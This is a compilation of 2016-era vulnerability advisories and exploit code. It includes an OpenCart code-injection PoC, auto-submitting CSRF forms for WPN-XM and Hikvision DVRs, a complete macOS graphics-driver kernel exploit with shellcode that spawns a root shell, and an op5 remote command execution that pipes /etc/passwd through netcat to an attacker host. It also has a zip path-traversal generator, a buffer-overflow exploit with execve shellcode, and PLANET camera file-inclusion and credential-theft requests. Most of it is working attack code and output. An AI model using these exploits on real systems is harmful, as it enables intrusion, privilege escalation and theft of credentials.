Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
------------
if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
user information like extra phone number,... you can directly execute your injected code.
go to http://host/shop_directory/index.php?route=account/edit
fill {$_GET[b]($_GET[c])} as Custom Field value
save it
go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/
Note:
------------
Exploit only works if PHP JSON extension is not installed.
Video: https://youtu.be/1Ai09IQK4C0
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
Vendor:
===========
wpn-xm.org
Product:
==============================================
WPN-XM Serverstack for Windows - Version 0.8.6
WPN-XM is a free and open-source web server solution stack for professional
PHP development on the Windows platform.
Vulnerability Type:
================================
CSRF - MySQL / PHP.INI Hijacking
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
WPN-XMs webinterface is prone to multiple CSRF entry points allowing remote
attackers to compromise an authenticated user if they visit
a malicious webpage or click an attacker supplied link. Attackers can
modify the 'PHP.INI' file to change arbitrary PHPs settings
like enable 'allow_url_include' or changing the default MySQL username &
password settings etc...
Exploit code(s):
===============
1) Hijack MySQL Account Default Settings
<iframe name="ifrm" width="600" height="700" name="hidden-form"></iframe>
<form target="ifrm" id="CSRF-MySQL-Username" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="page" value="config">
<input type="hidden" name="action" value="update-phpini-setting">
<input type="hidden" name="directive" value="mysql.default_user" />
<input type="hidden" name="value" value="hyp3rlinx" />
<script>document.getElementById('CSRF-MySQL-Username').submit()</script>
</form>
<form target="ifrm" id="CSRF-MySQL-PWD" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="page" value="config">
<input type="hidden" name="action" value="update-phpini-setting">
<input type="hidden" name="directive" value="mysql.default_password">
<input type="hidden" name="value" value="PWNED!" />
<script>document.getElementById('CSRF-MySQL-PWD').submit()</script>
</form>
2) Hijack PHP.INI Settings
<form id="CSRF-PHP-INI" method="post" action="
http://localhost/tools/webinterface/index.php?page=config&action=update-phpini-setting
">
<input type="hidden" name="directive" value="allow_url_include" />
<input type="hidden" name="value" value="On" />
<script>document.getElementById('CSRF-PHP-INI').submit()</script>
</form>
Disclosure Timeline:
=====================================
Vendor Notification: No Reply
April 9, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
=================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
hyp3rlinx
<!--
Hikvision Digital Video Recorder Cross-Site Request Forgery
Vendor: Hikvision Digital Technology Co., Ltd
Product web page: http://www.hikvision.com
Affected version: LV-D2104CS
DS-7316HFI-ST
DS-7216HVI-SV/A
DS-7208HVI-SH
DS-7204HVI-SH
Summary: Hikvision is the global leader of video surveillance
products and solutions, manufactures a wide range of top-quality,
reliable, and professional solutions.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: Hikvision-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5315
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5315.php
Vendor: http://overseas.hikvision.com/europe/list01_435.html
13.01.2016
--
CSRF Add Operator:
------------------
-->
<html>
<body>
<form action="http://10.0.0.8/PSIA/Security/AAA/users" method="POST" enctype="text/plain">
<input type="hidden" name="<?xml version" value="'1.0' encoding='utf-8'?><User><id>3</id><userName>tes2t</userName><password>test2</password><Extensions><bondIp><ipAddress>0.0.0.0</ipAddress></bondIp><attribute><inherent>true</inherent></attribute></Extensions></User>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
/*
░▀█▀░█▀█░█░░░█▀█░█▀▀░░░█░█░█░█░█░░░█▀█░█▀▄░█▀▀░█░█░
░░█░░█▀█░█░░░█░█░▀▀█░░░▀▄▀░█░█░█░░░█░█░█░█░█▀▀░▀▄▀░
░░▀░░▀░▀░▀▀▀░▀▀▀░▀▀▀░░░░▀░░▀▀▀░▀▀▀░▀░▀░▀▀░░▀▀▀░░▀░░
T A L O S V U L N D E V
Proof-of-Concept Exploit
Advisory: http://www.talosintel.com/reports/TALOS-2016-0088/
Snort rules: 37517, 37518
CVE-2016-1743
Author: Piotr Bania, Cisco Talos
Target: Apple Intel HD 3000 Graphics driver
Impact: Local Privilege Escalation (root)
Tested Configuration:
Apple Intel HD 3000 Graphics driver 10.0.0
Darwin Kernel Version 15.2.0
OSX 10.11.2
Compilation:
gcc TALOS-2016-0088_poc.c lsym.m -o TALOS-2016-0088_poc -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3
kudos:
qwertyoruiop (i've grabbed the lsym thing from you)
technical information (AppleIntelHD3000Graphics driver 10.0.0) :
...
__text:000000000001AA4E mov ecx, [rcx]
__text:000000000001AA50 add ecx, ecx
__text:000000000001AA52 sub eax, ecx
__text:000000000001AA54 cmp rbx, rax
__text:000000000001AA57 ja loc_1AC8C
__text:000000000001AA5D mov [rbp+var_54], esi
__text:000000000001AA60 mov rax, [rdi]
__text:000000000001AA63 mov esi, 168h
__text:000000000001AA68 call qword ptr [rax+980h] ; # WE CAN CONTROL THIS #
Expected output:
mac-mini:bug mini$ uname -a
Darwin BLAs-Mac-mini 15.2.0 Darwin Kernel Version 15.2.0: Fri Nov 13 19:56:56 PST 2015; root:xnu-3248.20.55~2/RELEASE_X86_64 x86_64
mac-mini:bug mini$ ./TALOS-2016-0088_poc
----------------------------------------------------------------
APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11
by Piotr Bania / CISCO TALOS
----------------------------------------------------------------
Alloc: deallocating!
Alloc: allocating 0x2000 (0x00000000 - 0x00002000)bytes
Alloc: vm_allocate ok, now vm_protect ...
Alloc: vm_allocate returned = 0 - addr = 0x00000000, vm_protect ok, filling
Mapping the kernel
MapKernel: kernel mapped
Initializing service
InitService: Trying: Gen6Accelerator
InitService: service ok!
Commencing stage 1
Stage1: Copying the stage1 payload 0x00001000 - 0x00001071
Stage1: Setting up the RIP to 0x00001000
Stage1: Copying trigger data
Stage1: Making stage1 call
Stage1: leaked kernel address 0xffffff8021e00000
Stage1: kernel address leaked, success!
ResolveApi: using kernel addr 0xffffff8021e00000 (file base = 0xffffff8000200000)
ResolveApi: _current_proc = 0xffffff8022437a60
ResolveApi: _proc_ucred = 0xffffff80223a9af0
ResolveApi: _posix_cred_get = 0xffffff802237e780
ResolveApi: _chgproccnt = 0xffffff80223a8400
Commencing stage 2
Stage2: preparing the stage2 payload
Stage2: Copying the stage2 payload 0x00001000 - 0x00001071
Stage2: Setting up the RIP to 0x00001000
Stage2: Copying trigger data
Stage2: Making stage2 call
Stage2: success, got root!
Stage2: now executing shell
sh-3.2# whoami
root
sh-3.2#
*/
#include "import.h"
/**
defines
**/
#define MEM_SIZE 0x2000
#define PAYLOAD_MEM_START 0x1000
#define INIT_SIG 0x0210010100000008
#define OFFSET_PAYLOAD_EXEC 0x980
#define OFFSET_ROOM 64
#define RESOLVE_SYMBOL_MY(map, name) lsym_find_symbol(map, name) - base + KernelAddr
/**
stage 1 payload - get kernel address and put it to 0x1000
; memory space for kernel address
nop
nop
nop
nop
nop
nop
nop
nop
save_regs64
; get msr entry
mov rcx, 0C0000082h ; lstar
rdmsr ; MSR[ecx] --> edx:eax
shl rdx, 32
or rax, rdx
; find kernel addr - scan backwards
MAX_KERNEL_SCAN_SIZE equ 10000h
KERNEL_SIG equ 01000007FEEDFACFh
PAGE_SIZE equ 1000h
mov rcx, MAX_KERNEL_SCAN_SIZE
and rax, not 0FFFFFh
xor rdx, rdx
mov r8, KERNEL_SIG
scan_loop:
sub rax, PAGE_SIZE
dec rcx
jz scan_done
; is sig correct?
cmp qword [rax], r8
jnz scan_loop
mov rdx, rax
scan_done:
; store the addr - rdx kernel addr, 0 if not found
lea rcx, [shell_start]
mov qword [rcx], rdx
load_regs64
xor rax, rax
xor r15, r15
ret
**/
unsigned char stage1[113] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55,
0x41, 0x56, 0x41, 0x57, 0x48, 0xB9, 0x82, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x32,
0x48, 0xC1, 0xE2, 0x20, 0x48, 0x09, 0xD0, 0x48, 0xC7, 0xC1, 0x00, 0x00, 0x01, 0x00, 0x48, 0x25,
0x00, 0x00, 0xF0, 0xFF, 0x48, 0x31, 0xD2, 0x49, 0xB8, 0xCF, 0xFA, 0xED, 0xFE, 0x07, 0x00, 0x00,
0x01, 0x48, 0x2D, 0x00, 0x10, 0x00, 0x00, 0x48, 0xFF, 0xC9, 0x74, 0x08, 0x4C, 0x39, 0x00, 0x75,
0xF0, 0x48, 0x89, 0xC2, 0x48, 0x8D, 0x0D, 0xA5, 0xFF, 0xFF, 0xFF, 0x48, 0x89, 0x11, 0x41, 0x5F,
0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF,
0xC3
};
/**
stage 2 payload - escalate
jmp over_api_table
api_current_proc dq 0
api_proc_ucred dq 0
api_posix_cred_get dq 0
api_chgproccnt dq 0
over_api_table:
save_regs64
mov rax, qword [api_current_proc]
call rax
mov rdi, rax ; rdi = cur_proc
; system v abi - rdi first arg
mov rax, qword [api_proc_ucred]
call rax
; rax = cur_ucred
mov rdi, rax
mov rax, qword [api_posix_cred_get]
call rax
; rax = pcred
mov dword [rax], 0
mov dword [rax+8], 0
load_regs64
xor rax, rax
xor r15, r15
ret
**/
#define OFF_API_START 2
#define OFF_API_CURRENT_PROC OFF_API_START
#define OFF_API_PROC_UCRED OFF_API_CURRENT_PROC + 8
#define OFF_API_POSIX_CRED_GET OFF_API_PROC_UCRED + 8
#define OFF_API_CHGPROCCNT OFF_API_POSIX_CRED_GET + 8 // not used in this example
unsigned char stage2[111] = {
0xEB, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8B,
0x05, 0xCD, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC9, 0xFF, 0xFF,
0xFF, 0xFF, 0xD0, 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x05, 0xC5, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0xC7,
0x00, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E,
0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5F, 0x5D, 0x5B, 0x48, 0x31, 0xC0, 0x4D, 0x31, 0xFF, 0xC3
};
/**
globals
**/
uint64_t mem;
io_connect_t conn;
uint64_t KernelAddr = 0;
lsym_map_t* MappingKernel = 0;
uint64_t api_current_proc = 0;
uint64_t api_proc_ucred = 0;
uint64_t api_posix_cred_get = 0;
uint64_t api_chgproccnt = 0;
/**
functions
**/
uint64_t Alloc(uint32_t addr, uint32_t sz)
{
mach_error_t k_error;
printf("Alloc: deallocating! \n");
vm_deallocate(mach_task_self(), (vm_address_t) addr, sz);
printf("Alloc: allocating 0x%x (0x%08x - 0x%08x) bytes\n", sz, addr, addr+sz);
k_error = vm_allocate(mach_task_self(), (vm_address_t*)&addr, sz, 0);
if (k_error != KERN_SUCCESS)
{
printf("Alloc: vm_allocate() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error);
exit(-1);
}
printf("Alloc: vm_allocate ok, now vm_protect ...\n");
k_error = vm_protect(mach_task_self(), addr, sz, 0, 7); //rwx
if (k_error != KERN_SUCCESS)
{
printf("Alloc: vm_protect() - failed with message %s (error = %d)!\n", mach_error_string(k_error), k_error);
exit(-1);
}
printf("Alloc: vm_allocate returned = %d - addr = 0x%08x, vm_protect ok, filling\n", k_error, addr);
while(sz--) *(char*)(addr+sz)=0;
return addr;
}
int MapKernel(void)
{
MappingKernel = lsym_map_file("/mach_kernel");
if (!MappingKernel || !MappingKernel->map)
{
MappingKernel = lsym_map_file("/System/Library/Kernels/kernel");
}
if (!MappingKernel || !MappingKernel->map)
{
printf("MapKernel: unable to map kernel, quiting \n");
return -1;
}
printf("MapKernel: kernel mapped \n");
return 1;
}
int ResolveApi(void)
{
uint64_t base = lsym_kernel_base(MappingKernel);
api_current_proc = RESOLVE_SYMBOL_MY(MappingKernel, "_current_proc");
api_proc_ucred = RESOLVE_SYMBOL_MY(MappingKernel, "_proc_ucred");
api_posix_cred_get = RESOLVE_SYMBOL_MY(MappingKernel, "_posix_cred_get");
api_chgproccnt = RESOLVE_SYMBOL_MY(MappingKernel, "_chgproccnt");
printf("ResolveApi: using kernel addr 0x%016llx (file base = 0x%016llx) \n", KernelAddr, base);
printf("ResolveApi: _current_proc = 0x%016llx \n", api_current_proc);
printf("ResolveApi: _proc_ucred = 0x%016llx \n", api_proc_ucred);
printf("ResolveApi: _posix_cred_get = 0x%016llx \n", api_posix_cred_get);
printf("ResolveApi: _chgproccnt = 0x%016llx \n", api_chgproccnt);
return 1;
}
int InitService(char *IoServiceName)
{
int type;
io_service_t service;
CFMutableDictionaryRef matching;
io_iterator_t iterator;
printf("InitService: Trying: %s \n", IoServiceName);
matching = IOServiceMatching(IoServiceName);
if( !matching)
{
printf("Initservice: IOServiceMatching() failed \n");
return -1;
}
if (IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator) != KERN_SUCCESS)
{
printf("InitService: IOServiceGetMatchingServices failed \n");
return -1;
}
service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL)
{
printf("InitService: IOIteratorNext failed \n");
return -1;
}
type = 0;
conn = MACH_PORT_NULL;
if (IOServiceOpen(service, mach_task_self(), 5, &conn) != KERN_SUCCESS)
{
printf("InitService: IOServiceOpen failed! \n");
return -1;
}
printf("InitService: service ok! \n");
return 1;
}
int Stage1(void)
{
unsigned char *p;
unsigned char *p_ptr;
kern_return_t k_error;
char UselessStruct[4096];
size_t UselessStructSize = 0x14;
p = (unsigned char*)mem;
p_ptr = p + OFFSET_ROOM;
printf("Stage1: Copying the stage1 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage1, sizeof(stage1));
printf("Stage1: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
*(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
printf("Stage1: Copying trigger data \n");
*(uint64_t*)p_ptr = INIT_SIG;
printf("Stage1: Making stage1 call\n");
k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
KernelAddr = *(uint64_t*)PAYLOAD_MEM_START;
printf("Stage1: leaked kernel address 0x%016llx \n", KernelAddr);
if ((KernelAddr == 0) || (KernelAddr == 0x90909090))
{
printf("Stage1: fatal kernel address is wrong, exiting \n");
return -1;
}
printf("Stage1: kernel address leaked, success! \n");
return 1;
}
int Stage2(void)
{
int i;
unsigned char *p;
unsigned char *p_ptr;
kern_return_t k_error;
char UselessStruct[4096];
size_t UselessStructSize = 0x14;
p = (unsigned char*)mem;
p_ptr = p + OFFSET_ROOM;
printf("Stage2: preparing the stage2 payload \n");
unsigned char *t = (unsigned char*)&stage2;
*(uint64_t*)(t + OFF_API_CURRENT_PROC) = api_current_proc;
*(uint64_t*)(t + OFF_API_PROC_UCRED) = api_proc_ucred;
*(uint64_t*)(t + OFF_API_POSIX_CRED_GET) = api_posix_cred_get;
*(uint64_t*)(t + OFF_API_CHGPROCCNT) = api_chgproccnt;
printf("Stage2: Copying the stage2 payload 0x%08x - 0x%08lx \n", PAYLOAD_MEM_START, PAYLOAD_MEM_START + sizeof(stage1));
memcpy((void*)(p + PAYLOAD_MEM_START), (void*)&stage2, sizeof(stage2));
printf("Stage2: Setting up the RIP to 0x%08x \n", PAYLOAD_MEM_START);
*(uint64_t*)(p + OFFSET_PAYLOAD_EXEC) = PAYLOAD_MEM_START;
printf("Stage2: Copying trigger data \n");
*(uint64_t*)p_ptr = INIT_SIG;
printf("Stage2: Making stage2 call\n");
k_error = IOConnectCallMethod(conn, 0x5, 0, 0, p_ptr, 0x8c, 0, 0, &UselessStruct, &UselessStructSize);
setuid(0);
if (getuid() == 0)
{
printf("Stage2: success, got root! \n");
printf("Stage2: now executing shell \n");
system("/bin/sh");
exit(0);
}
printf("Stage2: failed! \n");
return -1;
}
int main(void)
{
printf(" ---------------------------------------------------------------- \n");
printf(" APPLE MAC MINI AppleIntelHD3000Graphics EXPLOIT OSX 10.11 \n");
printf(" by Piotr Bania / CISCO TALOS \n");
printf(" ---------------------------------------------------------------- \n\n\n");
IOServiceClose(0);
IOServiceOpen(0, 0, 0, 0);
// if this fails and we are done
mem = Alloc(0, MEM_SIZE);
printf("Mapping the kernel \n");
if (MapKernel() == -1)
return -1;
printf("Initializing service \n");
if (InitService("Gen6Accelerator") == -1)
return -1;
printf("Commencing stage 1 \n");
if (Stage1() == -1)
return -1;
if (ResolveApi() == -1)
return -1;
printf("Commencing stage 2 \n");
Stage2();
return 1;
}
[+] Credits: hyp3rlinx
[+] Website: http://hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/OP5-REMOTE-CMD-EXECUTION.txt
Vendor:
============
www.op5.com
Product:
===========
op5 v7.1.9
op5 Monitor is a software product for server, Network monitoring and
management based on the open source Project Nagios.
Vulnerability Type:
========================
Remote Command Execution
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
op5 has a CSRF entry point that can be used to execute arbitrary remote
commands on op5 system sent via HTTP GET requests, allowing attackers
to completely takeover the affected host, to be victimized a user must be
authenticated and visit a malicious webpage or click an infected link...
Reference:
https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/
Exploit code(s):
===============
trivial RCE cat /etc/passwd... using netcat
nc.exe -vvlp 5555 > passwds.txt
https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20|%20nc%20192.168.1.102%205555
<https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20%7C%20nc%20192.168.1.102%205555>
result:
listening on [any] 5555 ...
192.168.1.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.1.102] from (UNKNOWN) [192.168.1.103] 56935: NO_DAT
sent 0, rcvd 1343
C:\netcat-win32-1.12>type passwds.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smstools:x:499:499::/var/lib/smstools:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
op5lsu:x:500:500::/home/op5lsu:/bin/bash
saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
monitor:x:299:48::/opt/monitor:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
Disclosure Timeline:
============================================
Vendor Notification: March 27, 2016
Vendor confirms vulnerability March 27, 2016
Vendor issue patched new release v7.2.0 April 5, 2016
April 6, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
=================================================================
Request Method(s): [+] GET
Vulnerable Product: [+] op5 v7.1.9
Vulnerable Parameter(s): [+] 'cmd_str'
=================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
hyp3rlinx
#!/usr/bin/python -w
# Title : Express Zip <= 2.40 Path Traversal
# Date : 07/04/2016
# Author : R-73eN
# Tested on : Windows Xp / Windows 7 Ultimate
# Software Link : http://www.nchsoftware.com/zip/
# Download Link: http://www.nchsoftware.com/zip/zipplus.exe
# Vulnerable Versions : Express Zip <= 2.40
# Express Zip doesn't validates " ..\ " which makes possible
# to do a path traversal attack which can be converted easily to RCE
# How to Reproduce:
# 1- Run Exploit
# 2- Right Click evil.zip go to Express Zip and click Extract Here
# 3- File will be extracted to the root of the partition in this case C:\POC.txt
# This quick and dirt code is written only for demonstration purposes.
# If you wanna profit from it you must modify it.
# Video: https://www.youtube.com/watch?v=kb43h8Hoo0o
#
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
import zipfile, sys
if(len(sys.argv) != 2):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt"
exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("evil.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\POC.txt")
zf.close()
print "[+] Created evil.zip successfully [+]"
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
jsacco@exploitpack.com
# Program affected: Multi Emulator Super System (MESS)
# Version: 0.154-3.1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
#
# Program description: MESS is an emulator for various consoles and
computing systems, sharing a
# lot of codebase with the MAME project.
# Kali Linux 2.0 package: pool/non-free/m/mame/mess_0.154-3.1_i386.deb
# MD5sum: ae8650a6de842e6792ba83785ac0dbef
# Website: http://mamedev.org/
#
# gdb$ run -gamma $(python -c 'print "\x41"*4080')
# Starting program: /usr/games/mess -gamma $(python -c 'print "\x41"*4080')
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library
"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
#
# Program received signal SIGSEGV, Segmentation fault.
#
#
--------------------------------------------------------------------------[regs]
#
# EAX: 0x00000000 EBX: 0x72203B22 ECX: 0x00001024 EDX: 0xBFFFE094 o d
I t S z a p c
# ESI: 0x00001024 EDI: 0xBFFFE095 EBP: 0x00001024 ESP: 0xBFFFD038 EIP:
0x41414141
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
#
#
--------------------------------------------------------------------------[code]
#
# => 0x9684539: mov esi,DWORD PTR [ebx+0x48]
# 0x968453c: lea edi,[ebp+esi*1+0x0]
# 0x9684540: push edi
# 0x9684541: push ebx
# 0x9684542: call 0x96843b0
# 0x9684547: add esp,0x10
# 0x968454a: test al,al
# 0x968454c: je 0x96845ad
#
#
--------------------------------------------------------------------------------
#
# 0x41414141 in ?? ()
#
# gdb$ backtrace
#
# #1 0x41414141 in ?? ()
import os,subprocess
def run():
try:
print "# Mess Emulator Buffer Overflow by Juan Sacco"
print "# This exploit is for educational purposes only"
# JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*4084
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*12
eip = "\xd1\xf3\xff\xbf"
subprocess.call(["mess",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, Mess emulator not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit Mess 0.154-3.1 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/
Security Adivisory
2016-04-06 www.orwelllabs.com
Twitter:@orwelllabs
mantra: ...not affect a product that is in scope for... AhHum!
Overview
========
Technical Risk: high
Likelihood of Exploitation: medium
Credits: Discovered and researched by Orwelllabs
CVE-Number: N/A
DWF: Submited
Adivisory URL:
http://www.orwelllabs.com/2016/02/planet-ip-surveillance-camera-local.html
[1]
Issues
=====
I. Local File Inclusion (42 vectors)
II. Arbitrary file read/Authentication bypass
III. Sensitive information disclosure
IV. Cross-site request forgery
V. Reflected Cross-site scripting
VI. hardcoded credentials
I. Local File Inclusion
=======================
* CLASS: External Control of File Name or Path [CWE-73]
The Web Management interface of PLANET IP surveillance Cams models
FW-ICA-2500,
ICA-2250VT, ICA-4200V, ICA-4500V, ICA-3350V, ICA-5350V AND ICA-8350 and
probably
others is prone to Local File Include (LFI).
PoC
---
The request bellow is generated when a new user is added, in this case
we are adding the following administrative credential for the cam:
"root:r00tx".
GET /cgi-bin/admin/querylogin.cgi HTTP/1.1
Host: {xxx.xxx.xxx.xxx}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101
Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp
Cookie: ipcam_profile=1; tour_index=-1; IsHideStreamingStatus=yes
Authorization: Basic YdRRtXW41YXRtad4=
Connection: keep-alive
If-Modified-Since: Mon, 08 Jul 2013 11:10:26 GMT
If the value of the parameter "redirect" was changed to any system file
will return the contents of that file, as shown below:
http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=/etc/passwd
In this case will retrieved the content of /etc/passwd
Vectors:
-------
There are a total of 42 vectors of LFI, the detailed results will be
published in www.orwelllabs.com [1] soon.
Basically all menus of the camera (shown below) to submit, add, modify and
remove settings trigger the corresponding
scripts to access resource that contains a parameter "redirect" which is
also affected.
[ ----------------------------]
[ #1: Network ---------------] -> 9
[ #2: Camera ---------------] -> 3
[ #3: System -------------- ] -> 2
[ #4: Video -------------- ] -> 4
[ #5: Audio -------------- ] -> 1
[ #6: User -------------- ] -> 1
[ #7: Protocol ------------- ] -> 2
[ #8: E-Mail -------------- ] -> 1
[ #9: Event Detection ------ ] -> 1
[ #10: Storage -------------- ] -> 2
[ #11: Continuous Recording - ] -> 1
[ #12: Recording List ------- ] -> 0
[ #13: Event Server --------- ] -> 11
[ #14: Event Schedule ------- ] -> 4
[ ----------+--------------- ]
II. Arbitrary file read/Authentication bypass
=============================================
The camera offers a feature to perform the download settings via a backup
file. However,
(how acess control is not effective) this file remains accessible via the
browser for an unauthenticated user.
PoC
---
wget --no-check-certificate https://{xxx.xxx.xxx.xxx}/backup.tar.gz
tar -xzvf backup.tar.gz
cat tmp/sysConfig/sysenv.cfg|strings|fmt|cut -f8,9 -d" "
It will return the credential to access the camera
Through this vulnerability a user can also obtain the credential of the AP
to which the camera is connected just parsing
the file: 'tmp/sysConfig/extra.info'
III. Sensitive information disclosure
=====================================
Using LFI vulnerability report, a user can obtain sensitive information
such as username and password by reading the log file, as follows:
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=&pwd=&grp=&sgrp=&action=&redirect=/var/log/messages
IV. Cross-site request forgery
==============================
Planet IP cams ICA-* are prone to Multple CSRF.
